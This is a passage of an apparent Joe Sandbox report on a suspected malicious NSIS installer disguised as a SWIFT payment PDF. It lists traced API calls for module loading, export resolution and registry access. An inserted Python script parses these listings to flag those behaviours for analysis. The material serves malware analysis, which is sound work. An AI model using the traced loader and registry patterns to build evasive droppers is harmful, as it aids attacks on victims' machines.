                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend$Timeout
                                      • String ID: !
                                      • API String ID: 1777923405-2657877971
                                      • Opcode ID: 3698ce71db31f8b469170a2b9811606ddb50db903b10dbb8916321b005f99d26
                                      • Instruction ID: 12ae1f52ecf524c97be6b8063d2fdb139482407b097923a357ceac7fbdf5fe65
                                      • Opcode Fuzzy Hash: 3698ce71db31f8b469170a2b9811606ddb50db903b10dbb8916321b005f99d26
                                      • Instruction Fuzzy Hash: 43219271A44248AFEF01AFB4CD8AAAE7FB5EF44348F14443EF501B61E1D6B95940DB18
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F93
                                        • Part of subcall function 00404E84: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,0078F2A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EBD
                                        • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,0078F2A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ECD
                                        • Part of subcall function 00404E84: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00402FA6,00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,0078F2A8,007898A8), ref: 00404EE0
                                        • Part of subcall function 00404E84: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll), ref: 00404EF2
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                      • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                      • String ID:
                                      • API String ID: 2987980305-0
                                      • Opcode ID: 0b3dc729bd951b2f0749e00079973c11294a56becaede699027b28deb442bc2b
                                      • Instruction ID: d3abe0a985e527f0133db3cb222e4045a6b822903cb71d54981d30858ec5e20d
                                      • Opcode Fuzzy Hash: 0b3dc729bd951b2f0749e00079973c11294a56becaede699027b28deb442bc2b
                                      • Instruction Fuzzy Hash: 01213032904211ABCF207F64CE49A6F79B0AF44358F20413BF601B62D1D7BD4E419A5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00405B77: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B84
                                        • Part of subcall function 004056BD: CharNextA.USER32(?,?,outvillain\faber.div,?,00405729,outvillain\faber.div,outvillain\faber.div,?,?,75EE3410,00405474,?,C:\Users\user\AppData\Local\Temp\,75EE3410,00000000), ref: 004056CB
                                        • Part of subcall function 004056BD: CharNextA.USER32(00000000), ref: 004056D0
                                        • Part of subcall function 004056BD: CharNextA.USER32(00000000), ref: 004056E4
                                      • lstrlenA.KERNEL32(outvillain\faber.div,00000000,outvillain\faber.div,outvillain\faber.div,?,?,75EE3410,00405474,?,C:\Users\user\AppData\Local\Temp\,75EE3410,00000000), ref: 00405765
                                      • GetFileAttributesA.KERNELBASE(outvillain\faber.div,outvillain\faber.div,outvillain\faber.div,outvillain\faber.div,outvillain\faber.div,outvillain\faber.div,00000000,outvillain\faber.div,outvillain\faber.div,?,?,75EE3410,00405474,?,C:\Users\user\AppData\Local\Temp\,75EE3410), ref: 00405775
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                      • String ID: outvillain\faber.div
                                      • API String ID: 3248276644-1876387199
                                      • Opcode ID: 948b862332c8f3da9c9767df0f5b65eb8bb3e35ca68fd5066b4b6d0f3dd8e5f9
                                      • Instruction ID: 9c3b755cb3c6d616dab6a000ce5f665f7bfd003de174882c1d400389f5d3e8f3
                                      • Opcode Fuzzy Hash: 948b862332c8f3da9c9767df0f5b65eb8bb3e35ca68fd5066b4b6d0f3dd8e5f9
                                      • Instruction Fuzzy Hash: 62F0C835105D5499C62237391D45AAF2658CD87364F180A3BF851B32D1DB3C8942BDAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00405DE2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405E3A
                                        • Part of subcall function 00405DE2: CharNextA.USER32(?,?,?,00000000), ref: 00405E47
                                        • Part of subcall function 00405DE2: CharNextA.USER32(?,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405E4C
                                        • Part of subcall function 00405DE2: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405E5C
                                      • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 004030DC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Char$Next$CreateDirectoryPrev
                                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 4115351271-2414109610
                                      • Opcode ID: 8e7680eb481f2e00cc16df113ff911000dfe49d9d02a3d1b6cba6af61926cd3a
                                      • Instruction ID: c9728f7b553dd8aa4c0e43ad66b561e8a411fb1fe81b444dc1201db4bd0af2db
                                      • Opcode Fuzzy Hash: 8e7680eb481f2e00cc16df113ff911000dfe49d9d02a3d1b6cba6af61926cd3a
                                      • Instruction Fuzzy Hash: 13D09222506D3122E99132263C06FCF1A4C8F8B35AF51817BF50A781855A6D1A92C9FE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(80000002,00405CA3,00000000,00000002,?,00000002,?,?,00405CA3,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405A87
                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00405CA3,?,00405CA3), ref: 00405AA8
                                      • RegCloseKey.KERNELBASE(?), ref: 00405AC9
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 3677997916-0
                                      • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                      • Instruction ID: 3b0245f56489bc6861cff030ff267d915796a633b737c7f0fb79f2751f8918b0
                                      • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                      • Instruction Fuzzy Hash: 74015A7114020AEFDB128F64EC88AEB3FACEF14394F044136F905A6260D235D964CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%
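The listing at 00401F93 above pairs GetModuleHandleA and LoadLibraryExA with GetProcAddress and FreeLibrary, and the helper at 00405A87 opens a key under root 80000002 (HKEY_LOCAL_MACHINE); these traces are the raw evidence behind the report's "Contains functionality to dynamically determine API calls" and "access loader functionality" signatures and its registry checks. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses lines in the `<Api>.<MODULE>(<stack values>), ref: <call site>` format used in these listings, flags the load-then-resolve pattern, and decodes the hKey root of Reg*KeyEx calls. The sample input is copied from the listings on this page; the line format the regular expression assumes is inferred from them, and the HKEY root values are standard Win32 constants.

```python
"""Parse the 'APIs' entries of a Joe Sandbox function listing and flag two patterns."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: copied from the function listings above (the NSIS stub
# function at 0x00401F93 and the registry helper at 0x00405A87). Joe Sandbox prints
# each call as "<Api>.<MODULE>(<stack values>), ref: <call site>"; calls made inside
# callees are prefixed with "Part of subcall function <addr>:".
SAMPLE_LOADER = r"""
• GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F93
  • Part of subcall function 00404E84: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000), ref: 00404EBD
  • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
• LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
• GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
• FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
"""

SAMPLE_REGISTRY = r"""
• RegOpenKeyExA.KERNELBASE(80000002,00405CA3,00000000,00000002,?,00000002,?,?,00405CA3,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405A87
• RegQueryValueExA.KERNELBASE(?,?,00000000,00405CA3,?,00405CA3), ref: 00405AA8
• RegCloseKey.KERNELBASE(?), ref: 00405AC9
"""

# Assumed line format, inferred from the listings; the argument list is optional because
# some entries (e.g. wsprintfA.USER32) are printed without one.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: str
    subcall: Optional[str]  # address of the callee the call was seen in, or None


def parse_listing(text: str) -> list:
    """Return one ApiCall per line that matches the Joe Sandbox 'APIs' format."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # section headers such as 'Strings' or 'Memory Dump Source' are skipped
        raw = m.group("args") or ""
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref"), m.group("sub")))
    return calls


LOADER_APIS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
               "GetModuleHandleA", "GetModuleHandleW", "LdrLoadDll"}
RESOLVER_APIS = {"GetProcAddress", "LdrGetProcedureAddress"}


def uses_dynamic_api_resolution(calls) -> bool:
    """True when the function (callees included) both obtains a module handle and
    resolves an export from it, the pattern behind the report's
    'dynamically determine API calls' signature."""
    names = {c.api for c in calls}
    return bool(names & LOADER_APIS) and bool(names & RESOLVER_APIS)


HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}


def registry_roots(calls) -> list:
    """Decode the hKey argument of Reg{Open,Create}KeyEx calls into a hive name.
    Only the first printed value is the real hKey: Joe Sandbox dumps more stack
    slots than the API actually takes, so later values are not trusted here."""
    out = []
    for c in calls:
        if not (c.api.startswith("RegOpenKeyEx") or c.api.startswith("RegCreateKeyEx")):
            continue
        if c.args and re.fullmatch(r"[0-9A-Fa-f]{8}", c.args[0]):
            out.append((c.api, HKEY_ROOTS.get(int(c.args[0], 16), "handle")))
    return out


if __name__ == "__main__":
    for name, text in (("loader", SAMPLE_LOADER), ("registry", SAMPLE_REGISTRY)):
        calls = parse_listing(text)
        print(name, len(calls), "calls; dynamic resolution:",
              uses_dynamic_api_resolution(calls), "; registry roots:", registry_roots(calls))
```

Running the script prints six parsed calls with the dynamic-resolution flag set for the loader listing and `HKEY_LOCAL_MACHINE` decoded for the registry listing. The same parser can be pointed at a whole exported report to find every function that resolves imports at run time or touches an autorun key, which is how one would confirm the report's signatures from the listings rather than trusting the summary.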

                                      APIs
                                        • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,00000527,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                      • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402466
                                      • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003,00020019), ref: 00402479
                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsv10BA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040248E
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Enum$CloseOpenValue
                                      • String ID:
                                      • API String ID: 167947723-0
                                      • Opcode ID: e0a1bc4ab8869d2a121cb057061cf9ed2671c29535a9e67340b1f386ccbb16c1
                                      • Instruction ID: d28fcdc599a7f9727bcbc73a1b2195d927587ee9f1dfd2233f1a348fd0a26dbd
                                      • Opcode Fuzzy Hash: e0a1bc4ab8869d2a121cb057061cf9ed2671c29535a9e67340b1f386ccbb16c1
                                      • Instruction Fuzzy Hash: AEF0F472A04205EFE7119F689E8CEBF7A6CEF40348F10483FF105B61C0D6B95E41962A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ReadFile.KERNELBASE(?,?,00000001,?,?,?,00000002), ref: 00402563
                                        • Part of subcall function 00405AD5: wsprintfA.USER32 ref: 00405AE2
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: FileReadwsprintf
                                      • String ID:
                                      • API String ID: 3326442220-0
                                      • Opcode ID: 14b2645a2d3aaee7aa82702909eb729c7392d646557c2fb458c46880e8a2d5aa
                                      • Instruction ID: 0299c1a24440926a7a2aae36e035f1b33a41ebd789bdaa0b01dbfd16c80bf010
                                      • Opcode Fuzzy Hash: 14b2645a2d3aaee7aa82702909eb729c7392d646557c2fb458c46880e8a2d5aa
                                      • Instruction Fuzzy Hash: 0F21E470D05299FFDF219B948E685AEBB759B01304F14417BF481B62D2D6BC8A81CB2D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,00000527,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                      • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F6
                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsv10BA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040248E
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 3677997916-0
                                      • Opcode ID: b439f61bfe72f3706feb706b2374f9df9e561f3deb36810b4298d1c7e54b1251
                                      • Instruction ID: ce2297d9d5ce314a5bfea79886eaba96e34c70be170e39046d40c33bd9eb9c4f
                                      • Opcode Fuzzy Hash: b439f61bfe72f3706feb706b2374f9df9e561f3deb36810b4298d1c7e54b1251
                                      • Instruction Fuzzy Hash: DB119E31D05205EFDB15DF64CA889AFBBB4EF45344F20843FE446B62C0D2B85A41DB2A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,00000527,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                      • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004022DD
                                      • RegCloseKey.ADVAPI32(00000000), ref: 004022E6
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CloseDeleteOpenValue
                                      • String ID:
                                      • API String ID: 849931509-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ShowWindow.USER32(00000000), ref: 00401579
                                      • ShowWindow.USER32(000103F6), ref: 0040158E
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
                                      • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                      Memory Dump Source
